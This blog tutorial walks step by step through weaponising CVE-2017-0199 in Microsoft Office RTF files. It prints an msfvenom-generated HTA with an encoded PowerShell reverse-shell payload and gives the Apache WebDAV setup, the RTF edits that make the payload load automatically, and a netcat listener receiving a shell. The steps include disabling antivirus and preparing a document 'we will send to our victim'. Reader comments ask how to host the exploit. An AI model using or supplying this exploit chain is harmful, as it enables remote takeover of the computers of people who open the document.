Exploiting CVE-2017-0199 – Complete Guide

Categories Security, Tutorials

Hello everyone, this month FireEye published a vulnerability known as CVE-2017-0199, which makes use of OLEv2 links in existing documents.
So, what is this OLEv2 object links? It’s basically an object (file) that we include in our file and it’s content will be loaded into the document. In short: file inside file

Quite confusing to start, but when we start using it, and exploiting this vulnerability, we understand better how it works.

Full Disclaimer: This vulnerability was reproduced in a lab environment, and should not be used for bad purposes. The contents, and the processes described below, were followed based on another blog post. Please check references below.

So, lets get things started:

Step 1:

Our 1st step is create an HTA file (this type of files are html applications which can run Jscript and Vbscript)

In this example we will assume our file it’s called “myhta.hta”

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
  <title>buhletxr-infosec.com</title>
  <script language="VBScript">
   OUR CODE TO GENERATE
  </script>
  <hta:application id="oHTA" applicationname="buhletxr-infosec.com CVE-2017-0199" application="yes">
  </hta:application>
 </head>
 <body>
 </body>
</html>

So this is a basic HTA application, without any script yet.
So,now we need to generate our vbscript code to include in this hta file.
To do so, lets make use of msvenom:

# msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.1.213 LPORT=21747 -f hta-psh
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 6823 bytes
<script language="VBScript">
 Set jkqW0xr = CreateObject("Wscript.Shell")
 Set bMBmwd = CreateObject("Scripting.FileSystemObject")
 If bMBmwd.FileExists(jkqW0xr.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
 jkqW0xr.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAkAHMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBOAC8ANgA5AFYAZwBDAEEANwAxAFcAVwAyACsAYgBTAEIAUgArAFQAcQBYACsAQgAxAFIAWgBNAG0AZwBkAFgAMwBKAHAAMwBVAGkAUgBkAHIAQQBoAHgAagBHAEoATQBRAFkAbgB1AEYAYQBGAFkAUQB5AFQARABKAGYAQQA0AEUAdQA2AC8AZQA5ADcAcwBDAEYAeABsAEwAVABLADkAbQBHAFIATABlAFoAeQBMAHQAOQA4ADUANQB3ADUATABMAEwAUQBZAFMAUQBLAHUAZgBrAFMAeQBjAFMAOABIAGEAMQB4ADMAKwBKACsAZgBQAHgAdwBNAEwAUQBUAE8AKwBEADQAUwBuAGEANgBOAEwANAB2AGwAWAB1ADcALwAxAGoAagBLAGsAdgBwAFYAQgA5AGYAcQA4AEwAQgBBAFkAaABVAG8AdABIADkATgBYAGYATwA4AFYATQBVAHgAOQAwAG8AcwBFAGsANABPAHoAdgByAFoARQBtAEMAUQA3AGEAYgAxAHkAOAB3AFEAMgBtAEsAZwB6AGsAbABPAE8AVQBGADcAaAA5AHUANAB1AE0ARQBIADEANwBQADcANwBEAEQAdQBCADkAYwA1AFgAdgA5AGcAawBaAHoAbQB4AFoAaQBtADQANwB0ACsASgBnADcAUgBLAEcAYgA3AHcAMABpAHgAOAA0AEIAMQB2AFcAWQBFAHMAWgBYAHYAMwAyAHIAQwB0AFAARAAxAHEAdwB1AFAAVwBRADIAVABmAG0AcQB2AGsAawBaAEQAdQBvAHUAcABWAFcAQgArAHkAbgBrAEQAcwBlAGIARwBQAE4AVgBsAFQAaABKAGwARQBZAEwAVgBwACsAUQA4AFAAaQBvAGIAbwBTAHAAdgBjAEIAWABZAEcAMgBKAFYAYwB6ADgAeQBFADIAcgBBAHAAdwBDAGYAZwBsAG0AVwBSAEoAeQAyAC8AUABrAEIAbgBiAGIAZgBCAFcARwB3AHkAUgB5AGsATwBzAG0ATwBBAFgAcAB1AGgASQB1AG8AMwB2AE0AVgA4AEsATQAwAGgAcgAzAE4AegA4AHQAdgBJACsAeQBrAEoARQBBAHcAegA3AEQAUwBSAFQAcgBPAEYAawBTAEIANgBmADEAbgBoADIANgBGAEkALwB3AFkAcwBaAGYANABWAFYANQA2AFAAYwBxADgAZgB0AEsASQBEAFYAawBpAFYAQwBEAGsATAB3AEIAVQA0ADMAYwBqAE8ASwBkAFoAbABWADQARABYAFEALwBqAEEASQA4AGUANgBFAEUARABuADUAKwAvAFAARAB4AHcANgBKAE0AQgBmAEwAZAB1AEgARABHAHIATABtAGYAQgBqAEEANgBtAEcANwBIAEcATQBEAHkAdwB5AGcAbABXADkAbAB6AHIAbABuAGoAVgBIAEIAcgBzAHkAagBaAHcATABRAHkAVABqAEkAcwB6AEwAaABwAEgAbwBUAHAAYgBNAFoAVgBNAGoARQBMAEYANwBWAGYARwAyAGkAVgAwAGkAQwA3AEoARwBvAEgAbABxAFoAbQBSAE4AdwBaAHEAQgBUAHgAcQBRAFQAVwBPAGgAagBuADUAbgArAFQAYQBWADIAOABJAEMASAB1AGIAawBJADcASQBFADYAWgBUAFAAeABiAHYATwBNAEYAeABkAHUAagAxAGsAdQB4AEsANABEAEYAVgA0AHMATgA3AEgAWQB4AHgAWgA3AE4AYwBpAFoAcgAzAFAAUwAxAG0AaABRAFEAOQBxAFEAcgBaAG8AUwA2AE8ARQBFAE8AeABDADQARgBWAEIAQgBXADQAUwBXAFkAWABYAEQANABxAGgASwBxAE8AQQBDAGEAZAB2AE0AcQB4AEcAQQBCAEsAWQB4AEwANgBTAEoAdABOADYAWAAzAGYAQQA1AEMAMQBRADYAMQAwADcAVABHAEQAVABPAG8ASQBhAGYARwA2AGQAaQBtADIASwAxAHgASwBFAHgASgBzAFkAVQB5AEYAbQAyAEgAMQBXAGUANABhAGsAWQBaAGMAZQB5AFUAbABlAFoAbQB3AGoATwBUAGgAYwBkAE8ARgBLAFkAcwB5AFIAeQBJAEgAWgB4ACsAcgBNAGYAWQBJAFQAYgBOAHkAYQBoAHgAUABlAEoAaQBjAGEATQBUAHIALwBSAGMAZgBaAE8ASwBqAGsAMABwAEMAVAAyAHcAdABJAFIAUQB3AEUAcABPAGcAYwA3AHkAagBFAGcAQQA1AEMANwA2AFEAbAAzAEgAVABBAGwAaQBpAGcATQBRADIAdABhAHoAVABHADAAUABxAHIAZQBvAGcAVwAwAE8AMgBSADUAMgBxADYAOQBCAGwAbABtACsAUwArAG0AYwBrAEoASwBKAFAAWQBnAFEAWgBaADEARwByAE0AYQBaAEoARwBGAHcATQBlAFQAawA1AHMAbgAwAGgAdwBqADIANwBvAFEAQwBTAHkAZgBCAFIAVQBqADQAcwBtAEMAbQA0AG8AYgBsAEsAVgA3AHgAYgA4AGIASAAvAGIAawBrAHQAcQAwADgAUQB3AHUATwB0AG8AdwBrAEQATgBpAFEAawB5AGcAUQA3AFIAUgAvAFAAdABGAFoAQQBsAHoAeABuAHgAbwBTADYAWgA0AE8AdQA5AEUASwB3AFMAUABKAEkAOAAwAFUAZABjAE8AMABGAE4AWAB0AFUAMQAxAGgAKwBxADEARQBCAG8AYgB2AEsANgBTAGwAZQBEAEQAZgBHAEoASQAzAFoATQAzADQAYwBqAHoAdQA5AGYAVgB1AEQAeQBYAGQAdABiADkAQQBTAHEAcABJAFAAWABHAGoAdABVAFQAawA5AE0AZwBYAHMAeQA4AGEAQgB1AGkAUgB6AGsAQwA3AFcAeQB2AEkANwBRAHcAOAB4AFEATQBIAG8AdQBJADcAWQB0AE4AcQBlAG0ASgBUADcAZwB4ADAAMABaAGQASQBFADMAbQA2ADEAdABOAE8AVwBwAGIAUwBhAEYATwBSAFAATwBxAEsAagBuAHEAVABKAC8AdABQAGQAcQBXAFQAawA5ADcATgBlAG8AeQB1ADEARAA3AHkANQBXAHQAWABiAGgAMwBKAFcALwAzADcAWABOACsANgB2AHgAaAAwAHAAZQAzAGMAeQBlAGYAYQBiAFMAbwBSAEMAZgB4AEkAOABxADEAbQArAG4AaABpAHgAdQBKAEUAawBpADMATgBqAEIAWAB2AHIANQBXAG4AbQBZAFAARwBpAGUAeQBMAHMASwA2AFEAOQBTAEEAMgBHAC8AQwAwAFcAdgAxAGwANgBEADYAcQB0AFAAMgBvAEEAbAB6AE4AdABQAG8ARQBXADQAcQBIAE4AeAA3AFMARQBOAEoAdgBRADYAcgBQAFYAeAAyAEUAdQB0AGIAcQAwAGgATgBiAGgAbQB6AEEAMgB2ADEAWQBDAGQAZgBhAFAARgBiAGQAegBXADIAdgA4AGQAVgBVAEMAWQA0AGoAcABFAGsASQB5AFIAUQBxAE0AawBEADIAcQB0AHQAbwBtAGEASwBXAG4AdwBuACsAUwBCADgAMgBrAEsANgBFAG4AZQBJAHQAYQB2AFAAawBvAGYAdQAxADQAWQBHAHUAUQBoAHoAMwBRAFEATABNAFkASgBQAEEAMwBxAGsAMgBmADcARABpAG0ANQBHAGYANwAzAG4ATwBDAEMASABBAHAAYwAvADkAdQAvAGwARQBRADIAZwBYAE0AdwAxAGkAcABoAEQAYwB2AHoARgBiADcAcABYAHEAaQBBADkAZABrADQAcgBHADkAYQBCAHQAcABhADcAVQBsAHoAVQBSAEcAZQBSAHEAMQBOAEYAdQAxADUANABZAGcAYwAwAEEAdABrAFYAagBwADkAZAB2AHQAUABOAHgAMgBOAGgASQBSAC8AMgBWAHMAWQBIAC8AeABXAGYAcwByAEIAcgArAHMAbQBFAEMALwB6AHAAZwB2AEMAUwByAFUAegBIAHoAUwBLADgAMwBnAFgAUABNAGwAeQB0AG0AOQB5AGUAQQBLADYARAB6AEkAMwBlAEwAcQA2ADEARgBRADIAUwAxAE8AMQBIADMAeQAwAG4AUABrAEwATwBtAE0AMwBhAEMAcgB3AC8ANQArAFkAbQBiAE4ARgByAGEAKwBmAG0AbgBQAEoAYwBoAG0AUwB0ADMAeQBjAEIAZgA3AGkAWABuAHIAMQBxAFAAYQBpAGUAcABiADEATgBJAFcAdQBnAHAANQBjAFUAaABSADQAbABjADkASQBaAGgAUgBIAEkATgBuAG4ALwB4AHUAWABDAFAAawB4AEIAVABhAEwASABRAGgATQBzAEMAUgBKAFIARwBUAHQANgB0AG4AcgBvAEoAZABNAHQAZABEADUAdgBCAFIAVwBMAEEAOABQAGoAbwB6AFoASABBAFAAUQBrAEsAegA1ADIAcwBYAEQAbwA3AHMAdwBBAHgAbABQAFYAegAwAGQAVQBIAE8AUABTAFkAWAAyAHUAdQBqADUAdABOAGEARQBmAE4AOQBVAGsAVABEAHYANwArAHMAMwBhAGkAZQBNAFAAdgBHAGEAegBsAFQAVwAzAEgAMgBVAHQASABkAE8AdABJAHkASQB1AC8ARQBpAFgAZQBvAGkAMwAzAC8AeAA5AFMAaQA5AHYASABoADUAZgA3AEgAbABLAGYAMQAzADYAegArAHkANgBpAG0ANwBXAEMAaQBGAGYAcgBMAHgAZgArAEUAKwBGAC8AegBNAFAARQBKAGcAdwAwAGQATABoAEYASwBkADUAMQA5AFYALwBUAFUAYQBUAFQAMwB0AGQAUQBFAFQAUABJAGwARQBYAHgANQBCACsAawAxAHgAawA3AHYASQBMAHYAcABIADgAQgBMAHYAbAB5ADIAUQB3AEwAQQBBAEEAPQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA="
 End If
</script>

Lets add the script to our hta file:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
  <title>Bonjour</title>
  <script language="VBScript">
   Set jkqW0xr = CreateObject("Wscript.Shell")
   jkqW0xr.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAkAHMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBOAC8ANgA5AFYAZwBDAEEANwAxAFcAVwAyACsAYgBTAEIAUgArAFQAcQBYACsAQgAxAFIAWgBNAG0AZwBkAFgAMwBKAHAAMwBVAGkAUgBkAHIAQQBoAHgAagBHAEoATQBRAFkAbgB1AEYAYQBGAFkAUQB5AFQARABKAGYAQQA0AEUAdQA2AC8AZQA5ADcAcwBDAEYAeABsAEwAVABLADkAbQBHAFIATABlAFoAeQBMAHQAOQA4ADUANQB3ADUATABMAEwAUQBZAFMAUQBLAHUAZgBrAFMAeQBjAFMAOABIAGEAMQB4ADMAKwBKACsAZgBQAHgAdwBNAEwAUQBUAE8AKwBEADQAUwBuAGEANgBOAEwANAB2AGwAWAB1ADcALwAxAGoAagBLAGsAdgBwAFYAQgA5AGYAcQA4AEwAQgBBAFkAaABVAG8AdABIADkATgBYAGYATwA4AFYATQBVAHgAOQAwAG8AcwBFAGsANABPAHoAdgByAFoARQBtAEMAUQA3AGEAYgAxAHkAOAB3AFEAMgBtAEsAZwB6AGsAbABPAE8AVQBGADcAaAA5AHUANAB1AE0ARQBIADEANwBQADcANwBEAEQAdQBCADkAYwA1AFgAdgA5AGcAawBaAHoAbQB4AFoAaQBtADQANwB0ACsASgBnADcAUgBLAEcAYgA3AHcAMABpAHgAOAA0AEIAMQB2AFcAWQBFAHMAWgBYAHYAMwAyAHIAQwB0AFAARAAxAHEAdwB1AFAAVwBRADIAVABmAG0AcQB2AGsAawBaAEQAdQBvAHUAcABWAFcAQgArAHkAbgBrAEQAcwBlAGIARwBQAE4AVgBsAFQAaABKAGwARQBZAEwAVgBwACsAUQA4AFAAaQBvAGIAbwBTAHAAdgBjAEIAWABZAEcAMgBKAFYAYwB6ADgAeQBFADIAcgBBAHAAdwBDAGYAZwBsAG0AVwBSAEoAeQAyAC8AUABrAEIAbgBiAGIAZgBCAFcARwB3AHkAUgB5AGsATwBzAG0ATwBBAFgAcAB1AGgASQB1AG8AMwB2AE0AVgA4AEsATQAwAGgAcgAzAE4AegA4AHQAdgBJACsAeQBrAEoARQBBAHcAegA3AEQAUwBSAFQAcgBPAEYAawBTAEIANgBmADEAbgBoADIANgBGAEkALwB3AFkAcwBaAGYANABWAFYANQA2AFAAYwBxADgAZgB0AEsASQBEAFYAawBpAFYAQwBEAGsATAB3AEIAVQA0ADMAYwBqAE8ASwBkAFoAbABWADQARABYAFEALwBqAEEASQA4AGUANgBFAEUARABuADUAKwAvAFAARAB4AHcANgBKAE0AQgBmAEwAZAB1AEgARABHAHIATABtAGYAQgBqAEEANgBtAEcANwBIAEcATQBEAHkAdwB5AGcAbABXADkAbAB6AHIAbABuAGoAVgBIAEIAcgBzAHkAagBaAHcATABRAHkAVABqAEkAcwB6AEwAaABwAEgAbwBUAHAAYgBNAFoAVgBNAGoARQBMAEYANwBWAGYARwAyAGkAVgAwAGkAQwA3AEoARwBvAEgAbABxAFoAbQBSAE4AdwBaAHEAQgBUAHgAcQBRAFQAVwBPAGgAagBuADUAbgArAFQAYQBWADIAOABJAEMASAB1AGIAawBJADcASQBFADYAWgBUAFAAeABiAHYATwBNAEYAeABkAHUAagAxAGsAdQB4AEsANABEAEYAVgA0AHMATgA3AEgAWQB4AHgAWgA3AE4AYwBpAFoAcgAzAFAAUwAxAG0AaABRAFEAOQBxAFEAcgBaAG8AUwA2AE8ARQBFAE8AeABDADQARgBWAEIAQgBXADQAUwBXAFkAWABYAEQANABxAGgASwBxAE8AQQBDAGEAZAB2AE0AcQB4AEcAQQBCAEsAWQB4AEwANgBTAEoAdABOADYAWAAzAGYAQQA1AEMAMQBRADYAMQAwADcAVABHAEQAVABPAG8ASQBhAGYARwA2AGQAaQBtADIASwAxAHgASwBFAHgASgBzAFkAVQB5AEYAbQAyAEgAMQBXAGUANABhAGsAWQBaAGMAZQB5AFUAbABlAFoAbQB3AGoATwBUAGgAYwBkAE8ARgBLAFkAcwB5AFIAeQBJAEgAWgB4ACsAcgBNAGYAWQBJAFQAYgBOAHkAYQBoAHgAUABlAEoAaQBjAGEATQBUAHIALwBSAGMAZgBaAE8ASwBqAGsAMABwAEMAVAAyAHcAdABJAFIAUQB3AEUAcABPAGcAYwA3AHkAagBFAGcAQQA1AEMANwA2AFEAbAAzAEgAVABBAGwAaQBpAGcATQBRADIAdABhAHoAVABHADAAUABxAHIAZQBvAGcAVwAwAE8AMgBSADUAMgBxADYAOQBCAGwAbABtACsAUwArAG0AYwBrAEoASwBKAFAAWQBnAFEAWgBaADEARwByAE0AYQBaAEoARwBGAHcATQBlAFQAawA1AHMAbgAwAGgAdwBqADIANwBvAFEAQwBTAHkAZgBCAFIAVQBqADQAcwBtAEMAbQA0AG8AYgBsAEsAVgA3AHgAYgA4AGIASAAvAGIAawBrAHQAcQAwADgAUQB3AHUATwB0AG8AdwBrAEQATgBpAFEAawB5AGcAUQA3AFIAUgAvAFAAdABGAFoAQQBsAHoAeABuAHgAbwBTADYAWgA0AE8AdQA5AEUASwB3AFMAUABKAEkAOAAwAFUAZABjAE8AMABGAE4AWAB0AFUAMQAxAGgAKwBxADEARQBCAG8AYgB2AEsANgBTAGwAZQBEAEQAZgBHAEoASQAzAFoATQAzADQAYwBqAHoAdQA5AGYAVgB1AEQAeQBYAGQAdABiADkAQQBTAHEAcABJAFAAWABHAGoAdABVAFQAawA5AE0AZwBYAHMAeQA4AGEAQgB1AGkAUgB6AGsAQwA3AFcAeQB2AEkANwBRAHcAOAB4AFEATQBIAG8AdQBJADcAWQB0AE4AcQBlAG0ASgBUADcAZwB4ADAAMABaAGQASQBFADMAbQA2ADEAdABOAE8AVwBwAGIAUwBhAEYATwBSAFAATwBxAEsAagBuAHEAVABKAC8AdABQAGQAcQBXAFQAawA5ADcATgBlAG8AeQB1ADEARAA3AHkANQBXAHQAWABiAGgAMwBKAFcALwAzADcAWABOACsANgB2AHgAaAAwAHAAZQAzAGMAeQBlAGYAYQBiAFMAbwBSAEMAZgB4AEkAOABxADEAbQArAG4AaABpAHgAdQBKAEUAawBpADMATgBqAEIAWAB2AHIANQBXAG4AbQBZAFAARwBpAGUAeQBMAHMASwA2AFEAOQBTAEEAMgBHAC8AQwAwAFcAdgAxAGwANgBEADYAcQB0AFAAMgBvAEEAbAB6AE4AdABQAG8ARQBXADQAcQBIAE4AeAA3AFMARQBOAEoAdgBRADYAcgBQAFYAeAAyAEUAdQB0AGIAcQAwAGgATgBiAGgAbQB6AEEAMgB2ADEAWQBDAGQAZgBhAFAARgBiAGQAegBXADIAdgA4AGQAVgBVAEMAWQA0AGoAcABFAGsASQB5AFIAUQBxAE0AawBEADIAcQB0AHQAbwBtAGEASwBXAG4AdwBuACsAUwBCADgAMgBrAEsANgBFAG4AZQBJAHQAYQB2AFAAawBvAGYAdQAxADQAWQBHAHUAUQBoAHoAMwBRAFEATABNAFkASgBQAEEAMwBxAGsAMgBmADcARABpAG0ANQBHAGYANwAzAG4ATwBDAEMASABBAHAAYwAvADkAdQAvAGwARQBRADIAZwBYAE0AdwAxAGkAcABoAEQAYwB2AHoARgBiADcAcABYAHEAaQBBADkAZABrADQAcgBHADkAYQBCAHQAcABhADcAVQBsAHoAVQBSAEcAZQBSAHEAMQBOAEYAdQAxADUANABZAGcAYwAwAEEAdABrAFYAagBwADkAZAB2AHQAUABOAHgAMgBOAGgASQBSAC8AMgBWAHMAWQBIAC8AeABXAGYAcwByAEIAcgArAHMAbQBFAEMALwB6AHAAZwB2AEMAUwByAFUAegBIAHoAUwBLADgAMwBnAFgAUABNAGwAeQB0AG0AOQB5AGUAQQBLADYARAB6AEkAMwBlAEwAcQA2ADEARgBRADIAUwAxAE8AMQBIADMAeQAwAG4AUABrAEwATwBtAE0AMwBhAEMAcgB3AC8ANQArAFkAbQBiAE4ARgByAGEAKwBmAG0AbgBQAEoAYwBoAG0AUwB0ADMAeQBjAEIAZgA3AGkAWABuAHIAMQBxAFAAYQBpAGUAcABiADEATgBJAFcAdQBnAHAANQBjAFUAaABSADQAbABjADkASQBaAGgAUgBIAEkATgBuAG4ALwB4AHUAWABDAFAAawB4AEIAVABhAEwASABRAGgATQBzAEMAUgBKAFIARwBUAHQANgB0AG4AcgBvAEoAZABNAHQAZABEADUAdgBCAFIAVwBMAEEAOABQAGoAbwB6AFoASABBAFAAUQBrAEsAegA1ADIAcwBYAEQAbwA3AHMAdwBBAHgAbABQAFYAegAwAGQAVQBIAE8AUABTAFkAWAAyAHUAdQBqADUAdABOAGEARQBmAE4AOQBVAGsAVABEAHYANwArAHMAMwBhAGkAZQBNAFAAdgBHAGEAegBsAFQAVwAzAEgAMgBVAHQASABkAE8AdABJAHkASQB1AC8ARQBpAFgAZQBvAGkAMwAzAC8AeAA5AFMAaQA5AHYASABoADUAZgA3AEgAbABLAGYAMQAzADYAegArAHkANgBpAG0ANwBXAEMAaQBGAGYAcgBMAHgAZgArAEUAKwBGAC8AegBNAFAARQBKAGcAdwAwAGQATABoAEYASwBkADUAMQA5AFYALwBUAFUAYQBUAFQAMwB0AGQAUQBFAFQAUABJAGwARQBYAHgANQBCACsAawAxAHgAawA3AHYASQBMAHYAcABIADgAQgBMAHYAbAB5ADIAUQB3AEwAQQBBAEEAPQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA="
  </script>
  <hta:application id="oHTA" applicationname="buhletxr-infosec.com CVE-2017-0199" application="yes">
  </hta:application>
 </head>
 <body>
 </body>
</html>

Please notice we deleted some lines from our script, since the powershell wasn’t beeing invoked using that method. (If anyone knows why, please let me know)
So, now we have our hta file created, with our reverse_shell payload.

Step 2:

Next step we must create a simple RTF document using Windows Word, with any legit content in it. In this case we will write the string: “This is just a buhlextr-infosec.com test” and save it as “myrtf.rtf”.

Ok, now that we have our 2 files, we upload them to our web server:

/var/www/html/ms# ls
myhta.hta myrtf.rtf

Step 3:

Now lets configure Apache to be able to include the “myrtf.rtf” as a link:

#a2enmod dav  
#a2enmod dav_fs  
#a2enmod dav_lock  
#a2enmod headers  
#service apache2 restart

Now lets add content-type application/rtf to all files in our webserver directory /ms and allow the PROPFIND request performed by Microsoft Office.

To do so edit file “000-default.conf” located in /etc/apache2/sites-enabled and add the following at the end:

<Directory /var/www/html/ms/>
  Header set Content-Type "application/rtf"
</Directory>
<Directory />
  Dav on
</Directory>

To finish restart your apache server

service apache2 restart

Step 4:

Now we need to create another rtf file, (this one is the one we will send to our victim) and insert there our rtf object.
We will call this file: “research-doc.rtf”
Lets create the file and add the object.

To do so, go to insert -> object and select Create from File tab.
Make sure you just select Link to file, and in the filename, add your url path:

Then save it.
Note: note that at this stage, if you have na AV with na updated database, it will detect it and remove it. Disable your AV at this stage.

Step 5:

After the creation of the file, lets make the OLE object to be loaded automatically, by adding objupdate between objautlink and rsltpict in our file “research-doc.rtf”.

To do so, open the file in notepad++ and search for object and do the following:

Change from

\object\objautlink\rsltpict

to

\object\objautlink\objupdate\rsltpict

So now we have our “research-doc.rtf” file which point to the object “myrtf.rtf” but we want it to actually point to our hta file.
So lets go into the next step.

Step 6:

So now we need to send the content of “myhta.hta” to “myrtf.rtf” and then change the application content-type to hta.

Lets do so:

/var/www/html/ms# cat myhta.hta > myrtf.rtf

Now edit your 000-default.conf file, and change from:

Header set Content-Type "application/rtf"

to:

Header set Content-Type "application/hta"

To finish restart your apache server

# service apache2 restart

Step 7:

Lets open our listener and open our “research-doc.rtf”

# nc -nlvp 21747
listening on [any] 21747
connect to [192.168.1.213] from (UNKNOWN) [192.168.1.217] 58028
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
whoami
desktop-hae3iae\buhletxr

There you go. Shell this! 😉

Note: If you don’t like the .rtf extension, on your final document “research-doc.rtf” rename it for whatever you want .doc it will also work 😉

References:https://rewtin.blogspot.com.br/2017/04/cve-2017-0199-practical-exploitation-poc.html

6 Comments

  • peneviper
    May 6, 2017

    hey buhl(ex)r thanks for your wonderful tutorial but i have a something that is confusing me, can i host a file on a web hosting server to carry out this exploit because i can’t find where i can edit the apache from CLI (or am not getting it right), i was think if i can use linux vps server for it. i want to host putty and see if it will launch from my server. please can you give me idea about what to do ??

    • admin
      July 28, 2017

      Hi there. Thanks for your appreciation.
      Yes, you can host it on hosting server.

  • Louis
    June 19, 2017

    Hi,

    I’m a Infosec class student and planned to demonstrate this exploit to my class as my assignment.]

    I have followed the guide completely but failed to replicate the exploit.

    May I ask what version of Microsoft Office do you use for this demonstration?

    I have tried Office 2007 SP 3, 2010 SP2 and 2013 SP1 without any success.

    The research-doc.rtf just opened fine but no code were executed.

    Thank you,
    Louis

    • admin
      July 28, 2017

      Hi there,

